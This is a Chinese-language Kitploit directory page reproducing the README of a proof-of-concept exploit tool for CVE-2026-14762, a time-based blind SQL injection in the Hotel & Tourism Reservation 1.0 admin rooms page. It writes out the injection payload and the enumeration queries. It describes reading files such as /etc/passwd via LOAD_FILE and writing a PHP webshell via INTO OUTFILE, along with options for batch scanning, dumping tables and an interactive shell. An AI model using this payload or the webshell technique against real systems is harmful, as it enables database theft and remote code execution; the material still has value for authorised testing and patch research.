Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-14762-PoC-Exploit — 多线程基于时间的盲SQL注入漏洞利用,针对Hotel & Tourism Reservation 1.0的CVE-2026-14762。枚举数据库、表、列;通过LOAD_FILE读取文件;写入PHP webshell以实现RCE。支持代理、批量扫描和交互式SQL shell。 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-14762-poc-exploit
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试命令与控制红队Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
数据库安全
GitHubtc4dy/cve-2026-14762-poc-exploit

CVE-2026-14762-PoC-Exploit

多线程基于时间的盲SQL注入漏洞利用,针对Hotel & Tourism Reservation 1.0的CVE-2026-14762。枚举数据库、表、列;通过LOAD_FILE读取文件;写入PHP webshell以实现RCE。支持代理、批量扫描和交互式SQL shell。

查看仓库
2122个月前尚未审核

CVE-2026-14762 – Code‑Projects Hotel & Tourism Reservation 1.0 SQL 注入漏洞利用工具

Python 3.11+ License CVSS CWE

功能完备、多线程、基于时间盲注的 SQL 注入漏洞利用工具,针对 CVE‑2026‑14762。
目标为 Code‑Projects Hotel & Tourism Reservation 应用(版本 1.0)的 /admin/rooms.php 端点。
可实现完整的数据库枚举、文件系统读取(LOAD_FILE)和任意文件写入(INTO OUTFILE / DUMPFILE)——最终通过部署 WebShell 实现远程代码执行。

CVE 漏洞利用


🚀 功能特性


📦 环境要求

  • Python ≥ 3.11
  • Python 包:
    • requests
    • urllib3
    • colorama(可选 – 用于彩色终端输出)

使用以下命令安装所有依赖:

root@kitploit:~
pip install requests urllib3 colorama

📖 使用方法

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 命令行参数


⚙️ 工作原理

载荷构造

delete 参数中注入以下内容:

root@kitploit:~
150' AND IF(<条件>, SLEEP(<延迟>), 0) AND '1'='1

IF() 函数判断条件;如果为真,数据库则休眠 <延迟> 秒。

二分法字符提取

对于每个字符位置,在 ASCII 范围(32–126)内进行二分查找,通过 > 和 = 比较确定正确字符。这将每个字符的请求数从 95 次减少到约 7–8 次,使提取过程非常高效。

元数据枚举

  • 数据库名称:SELECT DATABASE()

  • 表名:SELECT table_name FROM information_schema.tables WHERE table_schema='<数据库>' LIMIT n,1

  • 列名:SELECT column_name FROM information_schema.columns WHERE table_schema='<数据库>' AND table_name='<表名>' LIMIT n,1

数据外泄

  • SELECT <列名> FROM <表名> LIMIT 行号,1 – 逐行提取

  • 每个单元格使用相同的二分法技术逐字符提取

文件系统交互

  • 读取:LOAD_FILE('/路径/到/文件') – 需要 secure_file_priv 为空或指向目标目录

  • 写入:SELECT '<内容>' INTO OUTFILE '/路径/到/shell.php' – 需要 FILE 权限且 secure_file_priv 不限制


🛡️ 免责声明

此工具仅供授权的安全测试、教育研究和漏洞评估使用。 作者不对任何滥用、非法活动或由本软件造成的损害负责。 在测试之前,务必获得系统所有者的明确书面许可。

下载工具
类别功能
漏洞类型基于时间的盲 SQL 注入(CWE‑89)
攻击向量GET /admin/rooms.php?delete=<payload>
利用方式条件 SLEEP() 注入,结合二分法字符提取
数据库当前数据库名称提取
模式枚举通过 information_schema 枚举表名和列名
数据导出完整表导出(JSON 格式)——不限行数,可配置限制
文件读取LOAD_FILE() – 读取 MySQL 可读的任何文件(例如 /etc/passwd、配置文件)
文件写入INTO OUTFILE / DUMPFILE – 写入 PHP WebShell、后门或任意内容
交互式 Shell实时 SQL Shell(基于时间提取),用于手动查询
单条查询执行临时 SQL 并获取结果(最多 512 字符)
批量模式多目标扫描,可配置线程池(ThreadPoolExecutor)
代理支持HTTP/HTTPS 代理(Burp Suite、mitmproxy 等)
详细日志彩色输出,带时间戳的调试信息
零依赖仅需 requests、urllib3 和 colorama(可选)
参数缩写类型默认值说明
--target-tURL—单个目标 URL(例如 http://192.168.1.100)
--target-file-l文件—包含目标列表的文件(每行一个)
--threads—整数5多目标扫描的线程数
--output-o路径—输出文件(导出为 JSON,文件读取为纯文本)
--verbose-v标志False启用详细调试日志
--proxy—URL—HTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--user-agent-ua字符串Mozilla/5.0...自定义 User-Agent 头
--delay—浮点数5.0盲注入时的睡眠时间(秒)
--max-retries—整数3最大请求重试次数
--ssl-verify—标志False启用 SSL 证书验证
--webroot—路径/var/www/htmlINTO OUTFILE WebShell 写入的 Web 根目录
--dump-db—标志False导出当前数据库的所有表
--tables—标志False仅列出所有表名
--dump-table—表名—导出指定表(例如 --dump-table users)
--read—路径—通过 LOAD_FILE() 读取文件
--write-shell—标志False将 PHP WebShell(shell.php)写入 Web 根目录
--sql—查询语句—执行单条 SQL 查询(最多返回 512 字符)
--interactive-i标志False利用成功后启动交互式 SQL Shell